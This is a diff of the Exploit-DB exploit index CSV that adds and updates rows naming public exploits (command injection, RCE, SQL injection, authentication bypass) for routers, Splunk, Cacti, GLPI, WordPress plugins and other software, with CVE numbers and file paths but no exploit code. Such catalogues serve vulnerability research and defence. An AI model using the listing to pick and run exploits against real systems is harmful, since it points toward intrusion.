44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999,2018-02-26,2018-02-26,1,CVE-2018-6000;CVE-2018-5999,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/4b8a8fa2b197686d91414099d1ac90f80bfd71ba/modules/exploits/linux/http/asuswrt_lan_rce.rb
44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999,2018-02-26,2018-02-26,1,CVE-2018-6000;CVE-2018-5999,Remote,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/4b8a8fa2b197686d91414099d1ac90f80bfd71ba/modules/exploits/linux/http/asuswrt_lan_rce.rb
43881,exploits/hardware/remote/43881.txt,"AsusWRT Router < 3.0.0.4.380.7743 - LAN Remote Code Execution",2018-01-22,"Pedro Ribeiro",remote,hardware,,2018-01-25,2018-01-25,0,CVE-2018-6000;CVE-2018-5999,,,,,https://github.com/pedrib/PoC/blob/787b92c549c7a8ddd53740ef0fbc1e04c12a18b6/advisories/asuswrt-lan-rce.txt
51742,exploits/hardware/remote/51742.txt,"Atcom 2.7.x.x - Authenticated Command Injection",2023-10-09,"Mohammed Adel",remote,hardware,,2023-10-09,2023-10-09,0,,,,,,
50565,exploits/hardware/remote/50565.txt,"Auerswald COMfortel 2.8F - Authentication Bypass",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2021-12-06,0,,,,,,
50568,exploits/hardware/remote/50568.txt,"Auerswald COMpact 8.0B - Arbitrary File Disclosure",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2021-12-06,0,,,,,,
50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2022-01-05,0,CVE-2021-40859,,,,,
@ -3862,6 +3865,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
24892,exploits/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",remote,hardware,,2013-03-26,2013-03-26,0,OSVDB-91630,,,,,
51138,exploits/hardware/remote/51138.txt,"Router ZTE-H108NS - Authentication Bypass",2023-03-30,"George Tsimpidas",remote,hardware,,2023-03-30,2023-03-30,0,,,,,,
18779,exploits/hardware/remote/18779.txt,"RuggedCom Devices - Backdoor Access",2012-04-24,jc,remote,hardware,,2012-04-24,2012-04-24,0,CVE-2012-2441;OSVDB-81406;CVE-2012-1803,,,,,
51727,exploits/hardware/remote/51727.txt,"Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE)",2023-10-09,"Riyan Firmansyah of Seclab",remote,hardware,,2023-10-09,2023-10-09,0,,,,,,
50930,exploits/hardware/remote/50930.py,"Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)",2022-05-11,"Minh Khoa",remote,hardware,,2022-05-11,2022-05-11,0,CVE-2021-43164,,,,,
35800,exploits/hardware/remote/35800.txt,"RXS-3211 IP Camera - UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",remote,hardware,,2011-05-25,2015-01-16,1,,,,,,https://www.securityfocus.com/bid/47976/info
35997,exploits/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,remote,hardware,,2011-07-27,2015-02-06,1,,,,,,https://www.securityfocus.com/bid/48908/info
@ -3942,6 +3946,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9432,exploits/hardware/remote/9432.txt,"THOMSON ST585 - 'user.ini' Arbitrary Disclosure",2009-08-13,"aBo MoHaMeD",remote,hardware,,2009-08-12,,1,,,,,,
829,exploits/hardware/remote/829.c,"Thomson TCW690 - POST Password Validation",2005-02-19,MurDoK,remote,hardware,80,2005-02-18,,1,OSVDB-14023;CVE-2005-0494,,,,,
10362,exploits/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Disclosure",2009-12-09,"AnTi SeCuRe",remote,hardware,,2009-12-08,,0,OSVDB-104795,,,,,
51732,exploits/hardware/remote/51732.txt,"Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change",2023-10-09,LiquidWorm,remote,hardware,,2023-10-09,2023-10-09,0,,,,,,
51731,exploits/hardware/remote/51731.py,"Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction",2023-10-09,LiquidWorm,remote,hardware,,2023-10-09,2023-10-09,0,,,,,,
40275,exploits/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Command Execution",2016-08-19,"Shadow Brokers",remote,hardware,,2016-08-19,2017-11-22,0,,,,,,
51677,exploits/hardware/remote/51677.py,"TP-Link Archer AX21 - Unauthenticated Command Injection",2023-08-10,Voyag3r,remote,hardware,,2023-08-10,2023-08-10,0,CVE-2023-1389,,,,,
38186,exploits/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,remote,hardware,,2015-09-15,2015-09-15,0,OSVDB-127536,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5255.php
@ -9870,6 +9876,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23181,exploits/multiple/dos/23181.txt,"NullLogic Null HTTPd 0.5 - Remote Denial of Service",2003-09-24,"Luigi Auriemma",dos,multiple,,2003-09-24,2012-12-06,1,OSVDB-3571,,,,,https://www.securityfocus.com/bid/8697/info
49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",2020-12-17,"Guillaume PETIT",dos,multiple,,2020-12-17,2021-01-11,0,CVE-2020-35488,,,,,
10077,exploits/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",dos,multiple,389,2009-11-08,,1,,,,,,https://www.securityfocus.com/bid/27778/info
51746,exploits/multiple/dos/51746.txt,"OpenPLC WebServer 3 - Denial of Service",2023-10-09,"Kai Feng",dos,multiple,,2023-10-09,2023-10-09,0,,,,,,
17610,exploits/multiple/dos/17610.py,"OpenSLP 1.2.1 / < 1647 trunk - Denial of Service",2011-08-05,"Nicolas Gregoire",dos,multiple,,2011-08-05,2011-08-05,0,CVE-2010-3609,,,,http://www.exploit-db.comopenslp-1.2.1.tar.gz,
2444,exploits/multiple/dos/2444.sh,"OpenSSH 4.3 p1 - Duplicated Block Remote Denial of Service",2006-09-27,"Tavis Ormandy",dos,multiple,,2006-09-26,2016-09-12,1,OSVDB-29152;CVE-2006-4924,,,,http://www.exploit-db.comopenssh-4.1p1.tar.gz,
18756,exploits/multiple/dos/18756.txt,"OpenSSL - ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",dos,multiple,,2012-04-19,2012-04-19,1,CVE-2012-2131;OSVDB-81223;CVE-2012-2110,,,,,
@ -12172,6 +12179,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31990,exploits/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",webapps,multiple,,2014-02-28,2014-02-28,0,CVE-2013-6231;OSVDB-103890,,,,,
48817,exploits/multiple/webapps/48817.py,"SpamTitan 7.07 - Remote Code Execution (Authenticated)",2020-09-18,"Felipe Molina",webapps,multiple,,2020-09-18,2020-09-18,0,CVE-2020-11804;CVE-2020-11803;CVE-2020-11700;CVE-2020-11699,,,,,
21053,exploits/multiple/webapps/21053.txt,"Splunk 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",webapps,multiple,,2012-09-04,2012-09-04,0,OSVDB-85824,,,,,
51747,exploits/multiple/webapps/51747.py,"Splunk 9.0.5 - admin account take over",2023-10-09,"Redway Security",webapps,multiple,,2023-10-09,2023-10-09,0,CVE-2023-32707,,,,,
41779,exploits/multiple/webapps/41779.txt,"Splunk Enterprise - Information Disclosure",2017-03-31,hyp3rlinx,webapps,multiple,,2017-03-31,2017-03-31,1,CVE-2017-5607,,,,,
40895,exploits/multiple/webapps/40895.py,"Splunk Enterprise 6.4.3 - Server-Side Request Forgery",2016-12-09,Security-Assessment.com,webapps,multiple,,2016-12-09,2016-12-09,1,,,,,,
49297,exploits/multiple/webapps/49297.txt,"Spotweb 1.4.9 - 'search' SQL Injection",2020-12-21,BouSalman,webapps,multiple,,2020-12-21,2020-12-21,0,,,,,,
@ -14990,6 +14998,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11249,exploits/php/webapps/11249.txt,"BoastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,webapps,php,,2010-01-23,,0,,,,,,
18676,exploits/php/webapps/18676.txt,"BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,webapps,php,,2012-03-28,2012-08-13,1,OSVDB-80660,,,http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-04-06-at-21926-pm.png,http://www.exploit-db.combmachine-3.1.zip,
5858,exploits/php/webapps/5858.txt,"BoatScripts Classifieds - 'type' SQL Injection",2008-06-18,Stack,webapps,php,,2008-06-17,2016-12-08,1,OSVDB-46425;CVE-2008-2846,,,,,
51741,exploits/php/webapps/51741.py,"BoidCMS v2.0.0 - authenticated file upload vulnerability",2023-10-09,1337kid,webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-38836,,,,,
30575,exploits/php/webapps/30575.txt,"BOINC 5.10.20 - 'forum_forum.php?id' Cross-Site Scripting",2007-09-12,Doz,webapps,php,,2007-09-12,2013-12-29,1,CVE-2007-4899;OSVDB-38668,,,,,https://www.securityfocus.com/bid/25644/info
30576,exploits/php/webapps/30576.txt,"BOINC 5.10.20 - 'text_search_action.php?search_string' Cross-Site Scripting",2007-09-12,Doz,webapps,php,,2007-09-12,2013-12-29,1,CVE-2007-4899;OSVDB-38669,,,,,https://www.securityfocus.com/bid/25644/info
2153,exploits/php/webapps/2153.txt,"Boite de News 4.0.1 - 'index.php' Remote File Inclusion",2006-08-09,"the master",webapps,php,,2006-08-08,,1,OSVDB-29747;CVE-2006-4123,,,,,
@ -15226,6 +15235,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
12338,exploits/php/webapps/12338.txt,"Cacti 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",webapps,php,,2010-04-21,,1,CVE-2010-1431;OSVDB-63967,,Bonsai-SQL_Injection_in_Cacti.pdf,,,
33374,exploits/php/webapps/33374.txt,"Cacti 0.8.x - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-21,"Moritz Naumann",webapps,php,,2009-11-21,2014-05-16,1,CVE-2009-4032;OSVDB-60566,,,,http://www.exploit-db.comcacti-0.8.7e.zip,https://www.securityfocus.com/bid/37109/info
49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection",2021-04-29,"Leonardo Paiva",webapps,php,,2021-04-29,2021-10-29,0,CVE-2020-14295,,,,,
51740,exploits/php/webapps/51740.txt,"Cacti 1.2.24 - Authenticated command injection when using SNMP options",2023-10-09,"Antonio Francesco Sardella",webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-39362,,,,,
48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,,2020-02-24,2020-02-24,0,,,,,,
33809,exploits/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,webapps,php,,2014-06-18,2014-06-21,1,CVE-2014-4644;OSVDB-108452,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-06-21-at-102309.png,http://www.exploit-db.comsuperlinks-v1.4-2.tgz,
35578,exploits/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,webapps,php,,2014-12-19,2016-10-24,0,CVE-2014-4644;OSVDB-108452,,,,http://www.exploit-db.comsuperlinks-v1.4-2.tgz,
@ -15569,7 +15579,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33967,exploits/php/webapps/33967.txt,"Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,webapps,php,,2010-01-20,2014-07-05,1,,,,,,https://www.securityfocus.com/bid/40024/info
15223,exploits/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,webapps,php,,2010-10-09,2010-10-09,1,OSVDB-68620;CVE-2010-4799,,,,http://www.exploit-db.compwngame.zip,
7227,exploits/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php,,2008-11-24,,1,OSVDB-57377;CVE-2008-7072;OSVDB-50345;CVE-2008-7071,,,,,
51383,exploits/php/webapps/51383.py,"Chitor-CMS v1.1.2 - Pre-Auth SQL Injection",2023-04-20,msd0pe,webapps,php,,2023-04-20,2023-04-20,0,,,,,,
51383,exploits/php/webapps/51383.py,"Chitor-CMS v1.1.2 - Pre-Auth SQL Injection",2023-04-20,msd0pe,webapps,php,,2023-04-20,2023-10-09,0,CVE-2023-31714,,,,,
31390,exploits/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - 'category' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57649,,,,,https://www.securityfocus.com/bid/28219/info
31391,exploits/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - 'search' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57650,,,,,https://www.securityfocus.com/bid/28219/info
31389,exploits/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57648,,,,,https://www.securityfocus.com/bid/28219/info
@ -15719,6 +15729,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3542,exploits/php/webapps/3542.txt,"ClassWeb 2.0.3 - 'BASE' Remote File Inclusion",2007-03-22,GoLd_M,webapps,php,,2007-03-21,2016-09-30,1,OSVDB-37215;CVE-2007-1640;OSVDB-37214,,,,http://www.exploit-db.comclassweb_2.03.tar.gz,
34365,exploits/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",webapps,php,,2010-07-22,2014-08-19,1,,,,,,https://www.securityfocus.com/bid/41885/info
42773,exploits/php/webapps/42773.txt,"Claydip Airbnb Clone 1.0 - Arbitrary File Upload",2017-09-22,"Ihsan Sencan",webapps,php,,2017-09-24,2017-09-24,0,CVE-2017-14704,,,,,
51729,exploits/php/webapps/51729.txt,"Clcknshop 1.0.0 - SQL Injection",2023-10-09,CraCkEr,webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-4708,,,,,
7230,exploits/php/webapps/7230.pl,"Clean CMS 1.5 - Blind SQL Injection",2008-11-25,JosS,webapps,php,,2008-11-24,2017-01-03,1,OSVDB-50174;CVE-2008-5289,,,,,
7228,exploits/php/webapps/7228.txt,"Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php,,2008-11-24,,1,OSVDB-50174;CVE-2008-5290;OSVDB-50172;CVE-2008-5289,,,,,
46146,exploits/php/webapps/46146.txt,"Cleanto 5.0 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80,2019-01-14,2019-01-14,0,,"SQL Injection (SQLi)",,,,
@ -16213,6 +16224,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
30803,exploits/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 - Login SQL Injection",2007-11-24,"Aria-Security Team",webapps,php,,2007-11-24,2014-01-09,1,,,,,,https://www.securityfocus.com/bid/26558/info
27669,exploits/php/webapps/27669.txt,"Coppermine 1.4.4 - 'index.php' Local File Inclusion",2006-04-17,imei,webapps,php,,2006-04-17,2013-08-18,1,CVE-2006-1909;OSVDB-24744,,,,,https://www.securityfocus.com/bid/17570/info
18680,exploits/php/webapps/18680.txt,"coppermine 1.5.18 - Multiple Vulnerabilities",2012-03-30,waraxe,webapps,php,,2012-03-30,2012-03-30,1,OSVDB-80735;OSVDB-80734;OSVDB-80733;OSVDB-80732;OSVDB-80731;CVE-2012-1614;CVE-2012-1613,,,,http://www.exploit-db.comcpg1.5.18.7z,http://www.waraxe.us/advisory-81.html
51738,exploits/php/webapps/51738.txt,"Coppermine Gallery 1.6.25 - RCE",2023-10-09,"Mirabbas Ağalarov",webapps,php,,2023-10-09,2023-10-09,0,,,,,,
41876,exploits/php/webapps/41876.txt,"Coppermine Gallery < 1.5.44 - Directory Traversal",2017-02-15,"Hacker Fantastic",webapps,php,,2017-04-13,2019-03-28,0,,,,,,https://github.com/HackerFantastic/Public/blob/9a2eaaab7d8ea74afeb45703db106b2c0ab47fba/exploits/cpg15x-dirtraversal.txt
37437,exploits/php/webapps/37437.txt,"Coppermine Photo Gallery - 'index.php' Script SQL Injection",2012-06-20,"Taurus Omar",webapps,php,,2012-06-20,2015-06-30,1,,,,,,https://www.securityfocus.com/bid/54115/info
22473,exploits/php/webapps/22473.txt,"Coppermine Photo Gallery 1.0 - PHP Code Injection",2003-04-07,"Berend-Jan Wever",webapps,php,,2003-04-07,2012-11-12,1,OSVDB-50624,,,,,https://www.securityfocus.com/bid/7300/info
@ -16407,7 +16419,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
6586,exploits/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,webapps,php,,2008-09-25,,1,OSVDB-49048;CVE-2008-4484;OSVDB-48660,,,,,
31097,exploits/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,webapps,php,,2008-02-04,2014-01-21,1,CVE-2008-0700;OSVDB-41520,,,,,https://www.securityfocus.com/bid/27588/info
35155,exploits/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,webapps,php,,2010-12-26,2014-11-04,1,,,,,,https://www.securityfocus.com/bid/45594/info
51688,exploits/php/webapps/51688.txt,"Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)",2023-08-21,0xBr,webapps,php,,2023-08-21,2023-08-21,0,CVE-2023-37759,,,,,
51688,exploits/php/webapps/51688.txt,"Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)",2023-08-21,0xBr,webapps,php,,2023-08-21,2023-10-09,0,CVE-2023-37759,,,,,
32952,exploits/php/webapps/32952.txt,"CS Whois Lookup - 'ip' Remote Command Execution",2009-04-23,SirGod,webapps,php,,2009-04-23,2014-04-21,1,,,,,,https://www.securityfocus.com/bid/34700/info
27030,exploits/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injections",2005-12-25,r0t3d3Vil,webapps,php,,2005-12-25,2013-07-23,1,CVE-2005-4429;OSVDB-21370,,,,,https://www.securityfocus.com/bid/16134/info
31443,exploits/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,webapps,php,,2008-03-19,2014-02-06,1,CVE-2008-1458;OSVDB-43353,,,,,https://www.securityfocus.com/bid/28333/info
@ -19162,6 +19174,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51418,exploits/php/webapps/51418.py,"GLPI 9.5.7 - Username Enumeration",2023-05-02,"Rafael B.",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
51232,exploits/php/webapps/51232.txt,"GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34125,,,,,
51230,exploits/php/webapps/51230.txt,"GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31062,,,,,
51726,exploits/php/webapps/51726.py,"GLPI GZIP(Py3) 9.4.5 - RCE",2023-10-09,"Brian Peters",webapps,php,,2023-10-09,2023-10-09,0,CVE-2020-11060,,,,,
51233,exploits/php/webapps/51233.txt,"GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31056,,,,,
34758,exploits/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111920;OSVDB-111919,,,,,http://www.securify.nl/advisory/SFY20140901/glype_proxy_cookie_jar_path_traversal_allows_code_execution.html
34759,exploits/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111921,,,,,http://www.securify.nl/advisory/SFY20140902/glype_proxy_local_address_filter_bypass.html
@ -22489,6 +22502,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11478,exploits/php/webapps/11478.txt,"Limny 2.0 - Cross-Site Request Forgery (Create Admin User)",2010-02-16,"Luis Santana",webapps,php,,2010-02-15,,0,OSVDB-62389;CVE-2010-0709,,,,,
34198,exploits/php/webapps/34198.txt,"Limny 2.1 - 'q' Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",webapps,php,,2010-06-24,2014-07-29,1,,,,,,https://www.securityfocus.com/bid/41152/info
36494,exploits/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",webapps,php,,2012-01-04,2015-03-26,1,CVE-2012-5343;OSVDB-78093,,,,,https://www.securityfocus.com/bid/51261/info
51744,exploits/php/webapps/51744.txt,"Limo Booking Software v1.0 - CORS",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,,
38828,exploits/php/webapps/38828.php,"Limonade Framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",webapps,php,,2013-11-17,2015-11-30,1,OSVDB-99993,,,,,https://www.securityfocus.com/bid/63771/info
34811,exploits/php/webapps/34811.txt,"Linea21 1.2.1 - 'search' Cross-Site Scripting",2009-07-08,"599eme Man",webapps,php,,2009-07-08,2014-09-29,1,CVE-2009-2442;OSVDB-55741,,,,,https://www.securityfocus.com/bid/43711/info
10736,exploits/php/webapps/10736.txt,"lineaCMS - Cross-Site Scripting",2009-12-27,Phenom,webapps,php,,2009-12-26,,1,,,,,,
@ -23149,6 +23163,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48868,exploits/php/webapps/48868.py,"MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)",2020-10-12,bzyo,webapps,php,,2020-10-12,2020-10-12,0,,,,,,
45344,exploits/php/webapps/45344.txt,"MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection",2018-09-07,"Carlos Avila",webapps,php,80,2018-09-07,2018-09-07,0,,"SQL Injection (SQLi)",,,,
3924,exploits/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a - Remote File Inclusion",2007-05-14,"ThE TiGeR",webapps,php,,2007-05-13,,1,OSVDB-36239;CVE-2007-2706,,,,,
51737,exploits/php/webapps/51737.txt,"Media Library Assistant Wordpress Plugin - RCE and LFI",2023-10-09,"Florent MONTEL",webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-4634,,,,,
41557,exploits/php/webapps/41557.txt,"Media Search Engine Script - 'search' SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
12141,exploits/php/webapps/12141.txt,"MediaInSpot CMS - Local File Inclusion (1)",2010-04-11,"Amoo Arash",webapps,php,,2010-04-10,,1,OSVDB-63842,,,,,
17292,exploits/php/webapps/17292.txt,"MediaInSpot CMS - Local File Inclusion (2)",2011-05-16,"wlhaan haker",webapps,php,,2011-05-16,2011-05-16,1,,,,,,
@ -24781,6 +24796,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49431,exploits/php/webapps/49431.txt,"Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection",2021-01-15,"Mesut Cetin",webapps,php,,2021-01-15,2021-01-15,0,,,,,,
49420,exploits/php/webapps/49420.txt,"Online Hotel Reservation System 1.0 - Admin Authentication Bypass",2021-01-13,"Richard Jones",webapps,php,,2021-01-13,2021-01-13,0,,,,,,
49430,exploits/php/webapps/49430.txt,"Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF)",2021-01-15,"Mesut Cetin",webapps,php,,2021-01-15,2021-01-15,0,,,,,,
51728,exploits/php/webapps/51728.txt,"Online ID Generator 1.0 - Remote Code Execution (RCE)",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,,
49564,exploits/php/webapps/49564.txt,"Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass",2021-02-16,"Christian Vierschilling",webapps,php,,2021-02-16,2021-02-16,0,,,,,,
47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php,,2019-11-29,2019-11-29,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comonline-inventory-manager-3.2.zip,
42629,exploits/php/webapps/42629.txt,"Online Invoice System 3.0 - SQL Injection",2017-09-07,"Ihsan Sencan",webapps,php,,2017-09-07,2017-09-07,0,,,,,,
@ -29378,6 +29394,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3758,exploits/php/webapps/3758.php,"ShoutPro 1.5.2 - 'shout.php' Remote Code Injection",2007-04-17,Gammarays,webapps,php,,2007-04-16,2011-04-27,1,OSVDB-34999;CVE-2007-2141,,,,http://www.exploit-db.comShoutPro1.5.2.zip,
50941,exploits/php/webapps/50941.txt,"Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)",2022-05-17,"Akshay Ravi",webapps,php,,2022-05-17,2022-05-24,0,CVE-2022-0967,,,,,
8679,exploits/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injections",2009-05-14,YEnH4ckEr,webapps,php,,2009-05-13,,1,OSVDB-54503;CVE-2009-1650,,,,,
51745,exploits/php/webapps/51745.txt,"Shuttle-Booking-Software v1.0 - Multiple-SQLi",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,,
45773,exploits/php/webapps/45773.txt,"SiAdmin 1.1 - 'id' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80,2018-11-05,2018-11-05,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comSiAdmin-1.1.zip,
36482,exploits/php/webapps/36482.txt,"Siena CMS 1.242 - 'err' Cross-Site Scripting",2012-01-01,Net.Edit0r,webapps,php,,2012-01-01,2015-03-25,1,,,,,,https://www.securityfocus.com/bid/51218/info
12260,exploits/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,webapps,php,,2010-04-15,,1,OSVDB-63837;CVE-2010-1711;OSVDB-63836;CVE-2010-1710,,,,,
@ -32151,6 +32168,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17057,exploits/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2011-10-02,0,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,http://eidelweiss-advisories.blogspot.com/2011/03/webedition-cms-version-6102.html
35516,exploits/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2014-12-10,1,,,,,,https://www.securityfocus.com/bid/47065/info
17054,exploits/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",webapps,php,,2011-03-27,2011-03-29,1,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,
51743,exploits/php/webapps/51743.txt,"Webedition CMS v2.9.8.8 - Blind SSRF",2023-10-09,"Mirabbas Ağalarov",webapps,php,,2023-10-09,2023-10-09,0,,,,,,
51661,exploits/php/webapps/51661.txt,"Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-09-04,1,,,,,,
51662,exploits/php/webapps/51662.txt,"Webedition CMS v2.9.8.8 - Stored XSS",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-09-04,1,,,,,,
14132,exploits/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",webapps,php,,2010-06-30,2010-07-07,0,OSVDB-65930,,,,http://www.exploit-db.comwebERP_3.11.4.zip,
@ -32206,6 +32224,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
21269,exploits/php/webapps/21269.txt,"Webify eDownloads Cart - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php,,2012-09-12,2012-09-12,0,OSVDB-85662,,,,,
19574,exploits/php/webapps/19574.txt,"Webify Link Directory - SQL Injection",2012-07-04,"Daniel Godoy",webapps,php,,2012-07-04,2012-07-04,1,OSVDB-83688,,,,http://www.exploit-db.comWebifyLinkDirectory.zip,
